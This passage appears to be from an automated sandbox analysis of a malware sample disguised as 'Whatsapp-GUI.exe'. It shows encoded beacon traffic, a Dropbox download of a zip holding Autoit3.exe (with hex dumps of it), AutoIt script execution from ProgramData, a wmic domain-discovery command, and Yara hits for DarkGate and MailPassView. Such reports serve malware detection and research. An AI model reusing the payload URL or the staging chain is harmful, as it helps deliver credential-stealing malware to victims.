Dec 14, 2024 21:53:09.187659025 CET	703	OUT	Data Raw: 36 39 38 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 69 52 79 55 73 53 34 46 50 56 75 39 37 67 49 54 79 52 79 46 51 6b 6d 58 6d 4f 35 48 45 53 Data Ascii: 69894il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XiRyUsS4FPVu97gITyRyFQkmXmO5HES4qCRyFQ0IXmO8TESXPjR5UW94XmR8TES4HORyFWSIXmR8PES4HmRyFMi0HSOkFES4c2RyFQ00XmO5JES4c2RyFQSIXmON6ES4JmRyFf04XmO51ES4qhRyFQSIXmO5JES4TORyFKS0XmVu9fgIXvp5XxUMpRkALmxk
Dec 14, 2024 21:53:09.307974100 CET	79	OUT	Data Raw: 37 35 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 6d 4c 79 4e 41 47 30 58 32 4f 4f 7a 38 45 74 5a 47 4f 34 4b 45 70 30 71 47 4c 4f 7a Data Ascii: 7594il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XmLyNAG0X2OOz8EtZGO4KEp0qGLOz
Dec 14, 2024 21:53:09.768117905 CET	20	IN	Data Raw: 56 49 63 48 69 6c 36 71 4f 34 61 58 69 75 58 71 4f 43 0d 0a Data Ascii: VIcHil6qO4aXiuXqOC
Dec 14, 2024 21:53:11.267301083 CET	79	OUT	Data Raw: 37 35 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 6d 4c 79 4e 41 47 30 58 32 4f 4d 7a 38 45 74 5a 47 4f 34 4b 45 70 30 71 47 4c 4f 7a Data Ascii: 7594il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XmLyNAG0X2OMz8EtZGO4KEp0qGLOz
Dec 14, 2024 21:53:11.688016891 CET	20	IN	Data Raw: 56 49 63 48 69 6c 36 71 4f 34 61 58 69 75 58 71 4f 43 0d 0a Data Ascii: VIcHil6qO4aXiuXqOC
Dec 14, 2024 21:53:12.706018925 CET	95	OUT	Data Raw: 39 31 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 6d 4f 6b 63 45 53 34 63 4f 52 79 46 51 30 49 58 6d 4c 79 4e 41 47 30 58 32 65 4f 7a 38 45 74 Data Ascii: 9194il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XmOkcES4cORyFQ0IXmLyNAG0X2eOz8EtZGO4KEp0qGLOz
Dec 14, 2024 21:53:13.127912998 CET	20	IN	Data Raw: 56 49 63 48 69 6c 36 71 4f 34 61 58 69 75 58 71 4f 43 0d 0a Data Ascii: VIcHil6qO4aXiuXqOC
Dec 14, 2024 21:53:14.377101898 CET	79	OUT	Data Raw: 37 35 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 6d 4c 79 4e 41 47 30 58 32 65 78 7a 38 45 74 5a 47 4f 34 4b 45 70 30 71 47 4c 4f 7a Data Ascii: 7594il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XmLyNAG0X2exz8EtZGO4KEp0qGLOz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	162.125.65.18	443	1288	C:\Users\user\Desktop\Whatsapp-GUI.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 20:52:56 UTC	154	OUT	GET /scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=nll27ti7&dl=1 HTTP/1.1 Host: www.dropbox.com Connection: Keep-Alive
2024-12-14 20:52:57 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; i [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com/cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MzMxNTMwMTc0MjEyNTQ0Nzk5NDQ1NjQzMTYwOTM4MDAyNjkyNDc1; Path=/; Expires=Thu, 13 Dec 2029 20:52:56 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=Dq0OVn5n1-rw3BQsBvg6th0t; Path=/; Domain=dropbox.com; Expires=Sun, 14 Dec 2025 20:52:56 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=Dq0OVn5n1-rw3BQsBvg6th0t; Path=/; Expires=Sun, 14 Dec 2025 20:52:56 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=WF09510tKY; Path=/; Expires=Sun, 14 Dec 2025 20:52:56 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Thu, 13 Dec 2029 20:52:56 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Sat, 14 Dec 2024 20:52:57 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: ceef1acf74eb4f688d6fee963de75464 Connection: close
2024-12-14 20:52:57 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	162.125.69.15	443	1288	C:\Users\user\Desktop\Whatsapp-GUI.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 20:52:59 UTC	275	OUT	GET /cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1 HTTP/1.1 Host: uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-14 20:53:00 UTC	739	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="yutighh.zip"; filename*=UTF-8''yutighh.zip Content-Security-Policy: sandbox Etag: 1733837736740329d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 163 X-Webkit-Csp: sandbox Date: Sat, 14 Dec 2024 20:52:59 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 802739 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: c0c59d6b420a4ab191faf5cf5956300e Connection: close
2024-12-14 20:53:00 UTC	15645	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 05 2c 8a 59 e7 0e 09 76 4b f4 06 00 a8 a2 0d 00 0b 00 00 00 41 75 74 6f 69 74 33 2e 65 78 65 ec fd 7d 7c 53 45 16 38 8c df 24 b7 6d 80 c0 8d 52 b0 4a d5 aa 55 51 d0 ad 06 b4 35 a0 29 6d da 22 2d a4 94 b6 20 94 e2 8a b5 46 54 84 84 16 e9 2b 49 68 2f 43 00 77 51 f1 5d 17 77 d7 dd 65 57 54 14 50 c4 96 22 2d 82 bc c9 2a 08 08 2a ab 13 53 b5 68 2d 01 2a f7 77 ce 99 9b b6 e0 ee f7 fb 3c 9f cf f3 e7 af 30 b9 73 e7 ce eb 99 33 67 ce 99 39 73 26 ef 9e 95 92 49 92 24 19 9c a6 49 d2 46 49 fc 39 a4 ff fb 5f 82 41 92 06 5d f9 ee 20 69 7d bf 8f af da 68 c8 fd f8 aa 29 e5 0f ce 4f 9a 3b ef d1 07 e6 dd fb 70 d2 7d f7 3e f2 c8 a3 9e a4 df df 9f 34 cf fb 48 d2 83 8f 24 65 4e 2a 48 7a f8 d1 d9 f7 df 3c 70 60 ff 64 3d 8f a1 f3 33 57 4e be f8 c6 Data Ascii: PK,YvKAutoit3.exe}\|SE8$mRJUQ5)m"- FT+Ih/CwQ]weWTP"-*Sh-w<0s3g9s&I$IFI9_A] i}h)O;p}>4H$eN*Hz<p`d=3WN
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: 78 86 74 c5 7d 0e 49 7e c0 21 3d 06 df df fe bd 43 b2 94 3b a4 d3 e0 de 80 b0 ae 12 87 34 1c c2 57 40 f8 88 d9 0e 69 0b b8 51 10 76 d9 fd 0e e9 ae ff 64 48 ce 6f 32 a4 62 70 0f 82 1b ff 6d 86 74 69 21 ee f7 5f 76 de 9f 51 7f 46 ff 4c 97 5d f8 27 5f 16 13 1b d7 fb 6a ee d7 7f 80 65 e0 20 c5 7a d1 c5 83 e3 87 5c 36 f4 12 0a 4d b8 34 38 5e 8a 99 ea 90 c2 f7 38 a4 75 50 87 54 f0 4f 7b c8 21 cd 06 37 fe 64 86 54 06 75 1a 00 ed fa 37 d4 e3 5f 50 ff db c0 7d 0b 7e 99 47 eb 65 8c fb bf ff a1 79 18 a6 fd 19 f2 5b 33 c3 41 6e 91 ee 5f 09 cf 77 c1 ed 04 f7 8b ee 8e 9f 14 27 34 db ad 75 d5 16 32 a9 73 3a b8 81 8e 6f a3 f6 3d 1e 22 37 73 d3 2e d2 75 19 1e 20 15 0f df 5f 73 88 f0 ed f1 fd 15 99 52 3c 09 c4 27 4f 82 00 25 08 e3 6e 3c aa 68 b7 a9 ce 6e fe f6 4a a0 b3 25 Data Ascii: xt}I~!=C;4W@iQvdHo2bpmti!_vQFL]'_je z\6M48^8uPTO{!7dTu7_P}~Gey[3An_w'4u2s:o="7s.u _sR<'O%n<hnJ%
2024-12-14 20:53:00 UTC	739	IN	Data Raw: dc a8 f8 67 a2 78 2c 85 5f 13 46 41 8b 8a f3 71 46 49 e1 77 ae c6 2b 7b 83 39 49 7c f3 68 9a 51 58 64 1a 90 fb d7 2b d0 4c b4 ad a9 54 27 ad 33 fb 4e 46 34 17 b1 74 4b 8e c7 91 e3 49 cb 51 02 ef 2f c4 9b 5d 8a c4 cc 74 60 e5 f9 33 d3 ec 8a ff 31 33 1d bb 21 bc eb b0 21 dc d6 6b dc f3 10 cb b3 d0 f4 c3 e3 16 e2 c4 43 5a d9 fa 65 66 9f 2f a4 33 e2 63 d2 08 8b 14 ff 47 64 82 84 8f 7d 00 1e 11 96 25 a6 b1 47 17 68 5a b9 04 44 5b 23 e3 f6 73 1f 10 db 5f d5 b8 41 ee 35 13 37 e0 db b4 90 34 53 be 76 d3 d6 42 61 64 44 85 95 ed 51 bd dd bc 73 36 50 54 ab 68 0d da 52 fd e9 0e 89 0e d7 ee 71 05 9d ed 2e fe d2 6c 91 99 8c 3b 26 79 16 0a 93 11 0b 4c 6e dc 1d c3 be da c9 ef bf ce 40 69 ef 77 46 6d cb 89 fa 7b 07 43 91 0f 3e 04 24 42 f3 98 f3 c1 ff cc 03 e7 cd f3 36 2d Data Ascii: gx,_FAqFIw+{9I\|hQXd+LT'3NF4tKIQ/]t`313!!kCZef/3cGd}%GhZD[#s_A574SvBadDQs6PThRq.l;&yLn@iwFm{C>$B6-
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: 1d ee c0 8c e0 39 69 4a 6f 56 cd f3 fe 0b 38 74 f1 60 df 1b 31 e2 ce 34 5f 7b aa 2e 0f 15 e3 8a 5c 09 11 9d 4a 99 ed f1 d5 a2 38 34 ae 42 88 43 4e 33 0f 3d 46 77 6a 80 a0 e3 3c 88 72 8e f3 08 72 db ce e3 28 06 e5 1d 54 9d 27 48 08 72 72 fa d6 4e df 3a 50 02 72 76 6a 48 34 40 fe b9 08 e5 1f 8c 6a e6 c3 d2 89 92 bc 66 f0 de c3 aa bb 83 4e ee 82 a1 b0 bd 42 c8 38 5f 2f 10 32 0e 6b a9 c8 82 76 ba e8 73 3f 3e c3 83 c0 ba ba a0 b7 85 c7 1e 23 23 8e 77 3a d4 2c 34 ae c4 71 b9 b3 74 26 6b e9 31 6d d5 c6 df 84 a0 f0 f3 7a 9f 1c 5e 07 ad fe 27 dd 4c 27 9a ec 8e 29 45 70 2a 0d ab 45 91 52 c5 b5 d0 3b 3f e7 f7 16 51 f5 d8 05 40 9c 1e 85 a2 99 ef 9c 8f 5d 1c fe 98 c0 58 8e 59 aa 79 9d 68 1e c7 08 23 7d 80 e2 2f 84 4c 0b 8a dd 50 d0 76 a7 66 c0 82 4a 17 dc c4 c6 c9 38 Data Ascii: 9iJoV8t`14_{.\J84BCN3=Fwj<rr(T'HrrN:PrvjH4@jfNB8_/2kvs?>##w:,4qt&k1mz^'L')Ep*ER;?Q@]XYyh#}/LPvfJ8
2024-12-14 20:53:00 UTC	16174	IN	Data Raw: 09 ea fd a8 ff 43 cc 26 af 14 56 21 3e e7 d5 96 60 b2 d5 ac 58 b8 aa 24 bd 67 6b 84 7c 5a 31 5e 80 4e 05 58 9f fe 86 6a d1 3c 9b 5a 3d 2a d2 d4 e4 33 ef c0 6d 1f 58 ad 7c 39 84 ab 44 a8 56 6a 77 1a 46 fb a7 d2 42 d6 a5 67 f8 b2 c8 31 0b 6a c4 67 ff d8 8e fb 4f d1 02 2a 68 a8 da fe 75 fd ce a6 05 56 e5 79 dd 75 0b 68 ae 74 e3 ac f8 66 a3 f2 23 00 52 58 69 bb 21 e9 da 6e 6a 6c d1 e3 97 e0 16 2c 71 aa aa 3d 19 d7 d9 d9 13 ae dd ae 02 6e 87 d1 d8 03 46 e1 6a 2b 18 c2 00 e5 ab 38 8e 0b 73 1e 37 b5 1b c6 11 97 49 58 b9 52 b9 78 09 9a aa 2f ff 65 21 df c6 71 d7 af 30 bd af 1d fb 95 62 2b 58 a7 e0 7c 23 81 fe d3 64 31 0c 83 ec 33 e5 7c e8 51 d4 fb 8b 95 42 b8 09 ae ff e9 66 5d ca 92 4a ff 5f fe 65 e1 b0 d5 4a cb bb ad ea f4 83 7c e5 f0 03 45 56 e5 27 a7 31 ed 86 Data Ascii: C&V!>`X$gk\|Z1^NXj<Z=3mX\|9DVjwFBg1jgOhuVyuhtf#RXi!njl,q=nFj+8s7IXRx/e!q0b+X\|#d13\|QBf]J_eJ\|EV'1
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: 3c 95 2e a8 d1 6e f9 ef 20 20 d9 1d a6 55 9e a2 10 f9 b4 f2 b5 8e 7d 6c f0 ac 9c 17 90 cb 87 6c 5b c4 23 4b 43 3c 91 4b 4b a4 f2 a1 aa 64 bd e8 7a 42 55 55 b9 35 98 2b 55 ce 25 35 f2 49 d1 f5 59 36 7e 9e 38 c4 d9 3e cf 7d c2 3e d5 16 25 bf 1d 7b 7a ed 4e c3 14 63 48 c6 c3 8e cb 09 67 e1 f6 4e ef af 9d 81 89 e2 d3 3d 98 75 c7 a0 24 24 9c 75 7b ed bf f0 7d 47 c5 cf f7 f9 ff e0 6c 0f f1 15 a9 f8 6d 50 a3 af 15 53 7f 4b a5 6f 39 e4 27 9e ff 07 c8 86 15 73 1b fc cf e2 d1 01 bc 1a 52 0a c9 e2 5b 43 0a 21 be e4 a0 f4 d1 25 df 9a 1c 10 7a df 6a 10 9e 65 c2 dd 10 c7 62 f8 7b 76 ba 45 f8 1d fc 79 e1 af 13 fe f6 c2 5f 37 fc cd 80 bf ad f0 57 03 7f bf ef 4a 17 1e 05 e9 87 3c d1 85 5b 04 1b e8 0d 03 8e 04 bc 11 f0 ed 20 97 81 94 e1 dc 27 10 76 25 e0 d7 e0 5c 32 c8 4a Data Ascii: <.n U}ll[#KC<KKdzBUU5+U%5IY6~8>}>%{zNcHgN=u$$u{}GlmPSKo9'sR[C!%zjeb{vEy_7WJ<[ 'v%\2J
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: fc 60 25 5b c0 4f b6 9b e8 cd 3c f1 c8 83 10 2a f6 b4 63 7a ec 57 d8 3e 4e 86 be 9c ce 99 66 c4 9e b6 ff b3 b2 c2 7d e2 c9 50 e7 09 d5 1f ba 55 9f 70 22 3d f8 8e 6a b9 0f bf 04 81 45 67 02 2b 3a 23 5b 82 ed c3 98 73 82 e3 ba ae 02 df c6 c9 1b 52 7e 1b 08 3a 9a 9d b8 5b 55 03 6e 7b 22 1e 31 e4 2c c0 b5 c3 d8 1a 5f 6b 8b 3f 26 4d c6 f5 0a b6 ab a5 74 a2 7a 9c 8e 35 a8 7f de 22 08 c1 73 2d e8 0f 54 41 f2 a3 5f c3 d4 0c 18 e4 d9 6b 41 6c 46 3c b1 f5 da 89 6a d4 c1 73 b6 6b e7 e8 93 1f 8e 10 ea 46 a1 9f 2d ca b1 4f 17 8f 2c c4 3e 11 ba a5 fb 1c e8 e8 e0 56 29 8a 78 04 12 69 7c 6c 6b 30 b3 06 a3 56 17 27 5c f0 d4 0f d8 f0 15 fd f2 fe d2 8b bf 87 12 e1 98 ae 3c 5e c0 0b f4 57 45 54 a0 fd 1b d8 cb bf 03 45 92 45 81 5a ee b1 98 ad ab 31 69 2c fd 1d 96 c1 0c 08 69 Data Ascii: `%[O<*czW>Nf}PUp"=jEg+:#[sR~:[Un{"1,_k?&Mtz5"s-TA_kAlF<jskF-O,>V)xi\|lk0V'\<^WETEEZ1i,i
2024-12-14 20:53:00 UTC	210	IN	Data Raw: 57 d2 ae 4e cc 6a 3b fe a8 cb b4 75 4b 0b 48 1e 3d b8 60 5b 3d 85 53 0b 94 3a 89 f0 c2 0f 24 12 23 8c cf 11 86 92 cc cf c2 3b 75 52 fb 85 a6 a9 6f 00 0e 2c e4 76 fc 51 47 c2 1b 96 7b 3b fe a8 36 78 c3 b2 6f c7 1f 47 eb 6c 28 ab 9b 55 54 76 b5 51 96 d1 ca 8c 46 c7 02 db b8 4d d1 34 e8 93 56 0f 47 de c7 25 2a f5 07 da 67 15 06 4b 7d 71 82 45 ea 33 8b a3 95 ec 15 b2 eb 84 f4 e3 15 f8 41 9c a9 64 af 94 5d 4d f5 d9 2b f1 98 1d 21 93 95 f8 8e bc 79 9c 72 54 5e 7c 68 7b 27 84 4c 01 67 53 79 ea 03 07 6c 4a f6 52 69 a5 d5 ca cd 82 2f 2c 92 fa 71 c4 4b 6a 6e a7 1c ee 6a 24 59 47 95 a2 ad 5b 59 a0 2d 6e 2b 56 47 a2 9d a8 92 0e a5 bc Data Ascii: WNj;uKH=`[=S:$#;uRo,vQG{;6xoGl(UTvQFM4VG%*gK}qE3Ad]M+!yrT^\|h{'LgSylJRi/,qKjnj$YG[Y-n+VG
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: 59 2f 9d 82 7b b8 5a fa 71 60 f9 86 28 ae 13 72 f6 0a 4c 1e a3 b8 9a e4 ec 95 0e 3f 99 7c 8a 1d 64 28 8b 6d 4a 7c 73 1e 70 07 c0 97 be da 2c c4 3f 10 b0 49 35 36 93 cb e6 6c 5a 7d e6 81 46 9b 29 d7 e6 3c ba 66 10 7c 13 cd 4a 4d bf 95 74 ec 10 0d 61 d7 9a d4 fe f1 8d a8 f5 80 16 d6 ed 68 9d b0 80 bc f6 07 4d ab 2c b5 69 67 b0 f3 17 cb 73 93 e5 18 79 ae 55 bf e2 a6 de 79 a6 ff 1e 59 49 fd 1b 6c c7 c1 c4 c2 0b c9 a2 7d f4 f8 cf d9 25 9a 1d 9a ca 93 39 f4 3d 13 de 4b 61 f3 a3 59 48 de fc b0 a9 4c 71 91 34 63 ef 21 54 e1 cf 7f 07 b3 15 27 e4 93 9b 3b 34 4d 36 53 28 bd a2 f2 cd 4d f4 18 21 63 39 a6 08 cb 30 d7 ac 0e 55 6c f4 b3 7c 8f 55 4e 90 97 25 cb cb cc 95 f7 d8 8c 43 e8 02 78 09 f3 7c 1d c5 63 0a d0 d0 6d 9c 5f 9c a8 cc 4f b5 a3 28 15 f5 44 80 e6 6f ad f0 Data Ascii: Y/{Zq`(rL?\|d(mJ\|sp,?I56lZ}F)<f\|JMtahM,igsyUyYIl}%9=KaYHLq4c!T';4M6S(M!c90Ul\|UN%Cx\|cm_O(Do
2024-12-14 20:53:00 UTC	16384	IN	Data Raw: 7f 80 7e 42 95 dc d3 28 b9 fd 3a 04 9d 87 f9 47 ff 82 a0 c5 17 4c 17 95 a9 5b 59 2d c7 9a ab fc 68 4b 8b e3 b0 6c b0 11 32 52 87 25 36 25 b7 ab 22 7d b0 68 b6 99 55 63 ea e5 6a 88 07 45 80 c5 ba ab c3 67 9b 2e e7 76 3a 03 bc 84 9a 34 9e 78 98 ae 36 c7 ce 18 c9 57 7d 0a ed 72 47 40 18 54 1d 33 37 3b 88 4a e5 8a ab 33 c7 19 5a 33 da 97 6d a8 98 3e 58 8c 47 1b 80 f5 c6 ea 98 20 da e6 ad 4e 50 42 73 d5 f5 94 16 d9 54 cd 49 73 2b e6 ad 58 aa a8 5a 84 e7 17 08 6d 90 ca 4f 73 c2 5a 28 be 1e ad 7b 4e b2 39 47 18 0f 58 3d f1 d3 5d 9a 68 81 8c d5 1b eb 62 e2 e7 2a 36 56 3b 97 56 3d 67 84 45 1d ea 14 bb c4 11 10 0f 63 0d 81 58 50 68 67 79 27 ff f0 1c b4 5f 71 37 74 46 cd a3 61 63 ee 89 a1 e4 81 ce c8 22 0b 1f 40 cc ea 84 b9 ea 51 80 ea c1 ba 30 72 68 e5 1d 99 a2 d5 Data Ascii: ~B(:GL[Y-hKl2R%6%"}hUcjEg.v:4x6W}rG@T37;J3Z3m>XG NPBsTIs+XZmOsZ({N9GX=]hb*6V;V=gEcXPhgy'_q7tFac"@Q0rh

Target ID:	0
Start time:	15:52:52
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\Whatsapp-GUI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Whatsapp-GUI.exe"
Imagebase:	0xf30000
File size:	285'584 bytes
MD5 hash:	8C3EF2EBA970F543F0EBE6DCED908402
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:53:01
Start date:	14/12/2024
Path:	C:\ProgramData\Updater\UpdaterService.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Updater\UpdaterService.exe" "C:\ProgramData\Updater\ConfigUpdater.a3x"
Imagebase:	0x2d0000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.3941184211.0000000003F28000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000003.2230520854.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:53:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\addbage\gcdkfcc
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:53:03
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:53:03
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic ComputerSystem get domain
Imagebase:	0x660000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:53:19
Start date:	14/12/2024
Path:	C:\ProgramData\addbage\Autoit3.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x
Imagebase:	0xc40000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000008.00000002.2391824798.0000000004758000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
